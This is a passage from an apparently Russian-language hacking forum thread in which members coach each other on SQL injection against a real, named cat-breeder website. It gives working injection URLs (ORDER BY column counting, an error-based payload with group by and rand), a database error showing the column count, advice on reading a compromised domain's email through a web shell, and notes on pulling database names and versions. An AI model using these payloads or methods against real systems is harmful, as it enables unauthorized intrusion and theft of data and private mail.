Старый 30.05.2012, 14:07   #2051
c0ncat
 
Регистрация: 29.05.2012
Сообщений: 8
Репутация: -1
По умолчанию

Покажу на примере:

Цитата:
http://mainecoon-portal.ru/ViewPhoto.php?Id=-2776+order+by+100000000000000000000000000000000000 000000000000000000000000000000000--
Ошибки нет, как определить количество полей при таких обстоятельствах?
c0ncat вне форума   Ответить с цитированием
Старый 30.05.2012, 15:22   #2052
nikp
Banned
 
Регистрация: 05.07.2010
Сообщений: 201
Репутация: 183
По умолчанию

Цитата:
Сообщение от c0ncat Посмотреть сообщение
Покажу на примере:
Ошибки нет, как определить количество полей при таких обстоятельствах?
http://maine[delete]coon-portal.ru/ViewPhoto.php?Id=2776'+order+by+1--+
http://mainec[delete]oon-portal.ru/ViewPhoto.php?Id=2776'+order+by+100--+
nikp вне форума   Ответить с цитированием
Старый 30.05.2012, 18:01   #2053
Boolean
 
Регистрация: 19.10.2011
Сообщений: 111
Репутация: 34
По умолчанию

Цитата:
Сообщение от c0ncat Посмотреть сообщение
Ошибки нет, как определить количество полей при таких обстоятельствах?
Вам все же стоит что-то почитать на тему проведения SQL инъекций.

Код:
http://mainecoon-portal.ru/ViewPhoto.php?Id=2776'+order+by+1,2,3,4,5,6,7,8,9,10--+
Код:
Ошибка доступа к базе данных в строке 7 Unknown column '4' in 'order clause'
Следовательно количество полей = 3.
__________________
|
Boolean вне форума   Ответить с цитированием
Старый 30.05.2012, 18:07   #2054
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

или без подбора кол-ва (Error based SQLi):

http://mainecoonТИРЕportalТОЧКАru/ViewPhoto.php?Id=2776'+or+1+group+by+concat(left(v ersion(),64),rand(0)|0)+having+avg(0)or'
Pashkela вне форума   Ответить с цитированием
Старый 02.06.2012, 05:59   #2055
Shadowfolder
Banned
 
Регистрация: 25.01.2012
Сообщений: 26
Репутация: -8
По умолчанию

У меня такой вопрос.
Как получить доступ к почтовым адресам домена, если имеешь шелл к нему.(в бд такой информации нет)
Shadowfolder вне форума   Ответить с цитированием
Старый 02.06.2012, 12:21   #2056
16bit
 
Регистрация: 16.06.2011
Сообщений: 66
Репутация: 9
По умолчанию

узнаешь,как уходит почта
dig 'sitename' mx

смотришь - совпадают ли айпи у почтовика и у сайта.
если совпадают - узнаешь какой почтовик крутится на сайте - это лучше сделать через вебшелл,если есть полномочия.
после того,как понял что за почтовик - ищешь от него конфиг и смотришь,каким образом и куда складывается почта.
после этого пытаешься прочитать эти файлы (как правило,для этого нужны специальные привилегии).
16bit вне форума   Ответить с цитированием
Старый 02.06.2012, 12:41   #2057
Zed0x
Banned
 
Регистрация: 01.06.2012
Сообщений: 6
Репутация: -5
По умолчанию

Что нам дает функция user()?
Вот например, нашел я SQL inj:
Цитата:
http://site.com/index.php?id=1'+1,2,3,4,5+--+
У меня 5 полей, и вывожу так:
Цитата:
http://site.com/index.php?id=1'+1,2,3,database(),user()+--+
Команда database() и её применение мне понятно, это вывод название БД, а user()? И зачем это функция вообще нужна и как она применяется?
Zed0x вне форума   Ответить с цитированием
Старый 02.06.2012, 13:26   #2058
c0ncat
 
Регистрация: 29.05.2012
Сообщений: 8
Репутация: -1
По умолчанию

user() - Имя юзера в БД
database() - Название БД
version() - Версия MySQL
c0ncat вне форума   Ответить с цитированием
Старый 02.06.2012, 13:53   #2059
Zed0x
Banned
 
Регистрация: 01.06.2012
Сообщений: 6
Репутация: -5
По умолчанию

Это понятно, спасибо. Спасибо, c0ncat!
А теперь вопрос зачем нам это для взлома? Вот как я это сейчас представляю:
1) DataBase() - нужно для того чтобы в последствии вытащить таблицы из БД, а потом столбцы и строки.
2) version() - нужно для определения версии MySQL, так как если она будет больше 5, то можно работать с information_schema
3) А зачем мне нужно имя пользователя БД?
Zed0x вне форума   Ответить с цитированием
Старый 02.06.2012, 13:55   #2060
Twost
 
Аватар для Twost
 
Регистрация: 03.07.2010
Сообщений: 172
Репутация: 110
По умолчанию

Цитата:
Сообщение от Zed0x Посмотреть сообщение
Это понятно, спасибо. Спасибо, c0ncat!
А теперь вопрос зачем нам это для взлома? Вот как я это сейчас представляю:
1) DataBase() - нужно для того чтобы в последствии вытащить таблицы из БД, а потом столбцы и строки.
2) version() - нужно для определения версии MySQL, так как если она будет больше 5, то можно работать с information_schema
3) А зачем мне нужно имя пользователя БД?
https://rdot.org/forum/showthread.php?t=124

Мой тебе совет - сначала читай, много читай. Потом спрашивай. Так возможно сможешь избежать бана.

З.Ы. но не факт)
Twost вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot